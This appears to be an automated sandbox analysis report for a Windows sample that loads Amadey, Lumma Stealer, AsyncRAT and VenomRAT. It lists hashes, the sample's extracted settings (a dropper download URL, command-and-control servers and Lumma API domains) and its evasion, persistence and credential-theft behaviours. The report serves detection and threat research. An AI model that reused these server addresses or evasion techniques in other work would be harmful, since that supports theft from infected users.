amadey | 52255ef95a5cfa309e10a6a7ddc22140ca74f399d04097e6d498df078a6c79a2

Analysis

max time kernel
69s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
15/03/2025, 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b90944a141.exe
Size

938KB
MD5

d7dcdd913bd35547bec8cfcee2bdf4ea
SHA1

1494afb246db82becbd7000ed3761315f892673d
SHA256

52255ef95a5cfa309e10a6a7ddc22140ca74f399d04097e6d498df078a6c79a2
SHA512

ac0745c8fb3b8b074314841b391dcaa060182e52c762dad8207aaa43bb512150ff0b12ecb3d08b8576b208cd14b7b6fa6ecaed04947e647b93318e13c4bfbb29
SSDEEP

24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8a0lu:GTvC/MTQYxsWR7a0l

Score

10^/10

amadey asyncrat lumma venomrat 092155 default credential_access defense_evasion discovery execution persistence pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://zfurrycomp.top/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://8cjlaspcorne.icu/api

https://bugildbett.top/api

https://adweaponrywo.digital/api

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://ksterpickced.digital/api

https://biochextryhub.bet/api

https://q8explorebieology.run/api

https://gadgethgfub.icu/api

Extracted

Family

asyncrat

Version

| Controller

Botnet

Default

20.206.204.9:4449

Mutex

ammmjprqjnqswrieh

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

lumma

https://moderzysics.top/api

https://codxefusion.top/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

VenomRAT 2 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/files/0x000a000000024206-2750.dat	VenomRAT
behavioral2/memory/4736-2762-0x0000000000050000-0x0000000000068000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000a000000024206-2750.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JqGBbm7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	s7MG2VL.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	3196	powershell.exe
69	1964	powershell.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2960	powershell.exe
6516	powershell.exe
7020	powershell.exe
1964	powershell.exe
3196	powershell.exe
5304	powershell.exe
4496	powershell.exe
6656	powershell.exe
16660	powershell.exe
2056	powershell.exe
13248	powershell.exe
3200	powershell.exe
1372	powershell.exe
1672	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 13 IoCs

flow	pid	Process
78	3572	rapes.exe
121	4760	futors.exe
71	3572	rapes.exe
17	3572	rapes.exe
17	3572	rapes.exe
17	3572	rapes.exe
17	3572	rapes.exe
17	3572	rapes.exe
90	4760	futors.exe
90	4760	futors.exe
90	4760	futors.exe
95	3572	rapes.exe
13	3196	powershell.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
7148	msedge.exe
4836	msedge.exe
6180	chrome.exe
2084	chrome.exe
7092	chrome.exe
2940	chrome.exe
6500	chrome.exe
7128	msedge.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	s7MG2VL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	s7MG2VL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JqGBbm7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JqGBbm7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	zY9sqWs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 31 IoCs

pid	Process
4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
3572	rapes.exe
2092	a500e4f1ae.exe
4336	a500e4f1ae.exe
5368	JqGBbm7.exe
1220	zY9sqWs.exe
1916	Gxtuum.exe
844	v6Oqdnc.exe
2396	Bthvgkck.exe
1644	HmngBpR.exe
2684	SplashWin.exe
5800	SplashWin.exe
5908	ADFoyxP.exe
2088	amnew.exe
4760	futors.exe
3616	7T7bCyA.exe
4504	trano1221.exe
1868	rapes.exe
4596	futors.exe
3160	s7MG2VL.exe
4464	Gxtuum.exe
4052	trano1221.exe
6524	cronikxqqq.exe
6860	cronikxqqq.exe
6728	cronikxqqq.exe
3584	ZqkKpwG.exe
1992	ZqkKpwG.exe
2624	ZqkKpwG.exe
6632	dw.exe
1748	9JFiKVm.exe
4736	ejrEdhQT0y.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	JqGBbm7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	s7MG2VL.exe

Loads dropped DLL 38 IoCs

pid	Process
2684	SplashWin.exe
2684	SplashWin.exe
2684	SplashWin.exe
5800	SplashWin.exe
5800	SplashWin.exe
5800	SplashWin.exe
5800	SplashWin.exe
3616	7T7bCyA.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe
4052	trano1221.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 5 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	Bthvgkck.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
285	checkip.amazonaws.com
288	checkip.amazonaws.com
341	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
14588	powercfg.exe
14580	powercfg.exe
14572	powercfg.exe
14564	powercfg.exe
3056	powercfg.exe
1820	powercfg.exe
3784	powercfg.exe
5380	powercfg.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000024290-4026.dat	autoit_exe
behavioral2/files/0x000a00000002420e-4412.dat	autoit_exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2396	Bthvgkck.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
4732	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
3572	rapes.exe
5368	JqGBbm7.exe
844	v6Oqdnc.exe
1868	rapes.exe
3160	s7MG2VL.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2092 set thread context of 4336	2092	a500e4f1ae.exe	96
PID 5800 set thread context of 3076	5800	SplashWin.exe	110
PID 2612 set thread context of 424	2612	sihost.exe	130
PID 6524 set thread context of 6728	6524	cronikxqqq.exe	134
PID 3584 set thread context of 2624	3584	ZqkKpwG.exe	141
PID 1748 set thread context of 2752	1748	9JFiKVm.exe	154

UPX packed file 52 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4052-472-0x00007FFDB88D0000-0x00007FFDB8EB9000-memory.dmp	upx
behavioral2/memory/4052-477-0x00007FFDD7D80000-0x00007FFDD7D8F000-memory.dmp	upx
behavioral2/memory/4052-476-0x00007FFDCF720000-0x00007FFDCF743000-memory.dmp	upx
behavioral2/memory/4052-1147-0x00007FFDD30B0000-0x00007FFDD30BD000-memory.dmp	upx
behavioral2/memory/4052-1134-0x00007FFDCFA10000-0x00007FFDCFA3D000-memory.dmp	upx
behavioral2/memory/4052-1467-0x00007FFDCEB00000-0x00007FFDCEBCD000-memory.dmp	upx
behavioral2/memory/4052-1466-0x00007FFDBF420000-0x00007FFDBF940000-memory.dmp	upx
behavioral2/memory/4052-1465-0x00007FFDCF990000-0x00007FFDCF9C3000-memory.dmp	upx
behavioral2/memory/4052-1123-0x00007FFDD3110000-0x00007FFDD311D000-memory.dmp	upx
behavioral2/memory/4052-1097-0x00007FFDD25C0000-0x00007FFDD25D9000-memory.dmp	upx
behavioral2/memory/4052-2303-0x00007FFDDB560000-0x00007FFDDB572000-memory.dmp	upx
behavioral2/memory/4052-2302-0x00007FFDCF910000-0x00007FFDCF953000-memory.dmp	upx
behavioral2/memory/4052-2301-0x00007FFDC2DB0000-0x00007FFDC2ECC000-memory.dmp	upx
behavioral2/memory/4052-2584-0x00007FFDB88D0000-0x00007FFDB8EB9000-memory.dmp	upx
behavioral2/memory/4052-2588-0x00007FFDCF500000-0x00007FFDCF52B000-memory.dmp	upx
behavioral2/memory/4052-2577-0x00007FFDCF890000-0x00007FFDCF8BE000-memory.dmp	upx
behavioral2/memory/4052-2576-0x00007FFDCBE70000-0x00007FFDCBF2C000-memory.dmp	upx
behavioral2/memory/4052-2575-0x00007FFDBF1D0000-0x00007FFDBF419000-memory.dmp	upx
behavioral2/memory/4052-2574-0x00007FFDCF8C0000-0x00007FFDCF8E4000-memory.dmp	upx
behavioral2/memory/4052-2300-0x00007FFDCF960000-0x00007FFDCF986000-memory.dmp	upx
behavioral2/memory/4052-2299-0x00007FFDDB580000-0x00007FFDDB58B000-memory.dmp	upx
behavioral2/memory/4052-2298-0x00007FFDDB590000-0x00007FFDDB5A4000-memory.dmp	upx
behavioral2/memory/4052-2297-0x00007FFDD5C60000-0x00007FFDD5CE7000-memory.dmp	upx
behavioral2/memory/4052-2296-0x00007FFDCEA30000-0x00007FFDCEAFF000-memory.dmp	upx
behavioral2/memory/4052-1144-0x00007FFDCF9D0000-0x00007FFDCFA06000-memory.dmp	upx
behavioral2/memory/4052-1126-0x00007FFDD1F60000-0x00007FFDD1F79000-memory.dmp	upx
behavioral2/memory/4052-2646-0x00007FFDB88D0000-0x00007FFDB8EB9000-memory.dmp	upx
behavioral2/memory/4052-2652-0x00007FFDCF990000-0x00007FFDCF9C3000-memory.dmp	upx
behavioral2/memory/4052-2670-0x00007FFDCF8C0000-0x00007FFDCF8E4000-memory.dmp	upx
behavioral2/memory/4052-2673-0x00007FFDCF500000-0x00007FFDCF52B000-memory.dmp	upx
behavioral2/memory/4052-2672-0x00007FFDCBE70000-0x00007FFDCBF2C000-memory.dmp	upx
behavioral2/memory/4052-2671-0x00007FFDBF1D0000-0x00007FFDBF419000-memory.dmp	upx
behavioral2/memory/4052-2669-0x00007FFDDB560000-0x00007FFDDB572000-memory.dmp	upx
behavioral2/memory/4052-2668-0x00007FFDCF910000-0x00007FFDCF953000-memory.dmp	upx
behavioral2/memory/4052-2667-0x00007FFDC2DB0000-0x00007FFDC2ECC000-memory.dmp	upx
behavioral2/memory/4052-2666-0x00007FFDCF960000-0x00007FFDCF986000-memory.dmp	upx
behavioral2/memory/4052-2665-0x00007FFDDB580000-0x00007FFDDB58B000-memory.dmp	upx
behavioral2/memory/4052-2664-0x00007FFDDB590000-0x00007FFDDB5A4000-memory.dmp	upx
behavioral2/memory/4052-2663-0x00007FFDD5C60000-0x00007FFDD5CE7000-memory.dmp	upx
behavioral2/memory/4052-2662-0x00007FFDCEA30000-0x00007FFDCEAFF000-memory.dmp	upx
behavioral2/memory/4052-2661-0x00007FFDCEB00000-0x00007FFDCEBCD000-memory.dmp	upx
behavioral2/memory/4052-2660-0x00007FFDBF420000-0x00007FFDBF940000-memory.dmp	upx
behavioral2/memory/4052-2651-0x00007FFDCF9D0000-0x00007FFDCFA06000-memory.dmp	upx
behavioral2/memory/4052-2650-0x00007FFDCFA10000-0x00007FFDCFA3D000-memory.dmp	upx
behavioral2/memory/4052-2649-0x00007FFDD1F60000-0x00007FFDD1F79000-memory.dmp	upx
behavioral2/memory/4052-2648-0x00007FFDD7D80000-0x00007FFDD7D8F000-memory.dmp	upx
behavioral2/memory/4052-2647-0x00007FFDCF720000-0x00007FFDCF743000-memory.dmp	upx
behavioral2/memory/4052-2645-0x00007FFDD3110000-0x00007FFDD311D000-memory.dmp	upx
behavioral2/memory/4052-2644-0x00007FFDCF890000-0x00007FFDCF8BE000-memory.dmp	upx
behavioral2/memory/4052-2643-0x00007FFDD25C0000-0x00007FFDD25D9000-memory.dmp	upx
behavioral2/memory/4052-2642-0x00007FFDD30B0000-0x00007FFDD30BD000-memory.dmp	upx
behavioral2/files/0x000a000000024240-3920.dat	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
File created	C:\Windows\Tasks\Gxtuum.job	zY9sqWs.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3040	sc.exe
14292	sc.exe
16608	sc.exe
5172	sc.exe
12312	sc.exe
12588	sc.exe
14524	sc.exe
5204	sc.exe
4252	sc.exe
17160	sc.exe
14388	sc.exe
14484	sc.exe
12512	sc.exe
12580	sc.exe
14444	sc.exe
3488	sc.exe
6428	sc.exe
1592	sc.exe
6616	sc.exe
2872	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x00070000000241e2-332.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
7020	6524	WerFault.exe	132
16496	6692	WerFault.exe	334
16488	5184	WerFault.exe	333
16620	6920	WerFault.exe	330
16772	6920	WerFault.exe	330

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b90944a141.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a500e4f1ae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JqGBbm7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZqkKpwG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SCHTASKS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s7MG2VL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cronikxqqq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a500e4f1ae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cronikxqqq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZqkKpwG.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6692	cmd.exe
2528	PING.EXE

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
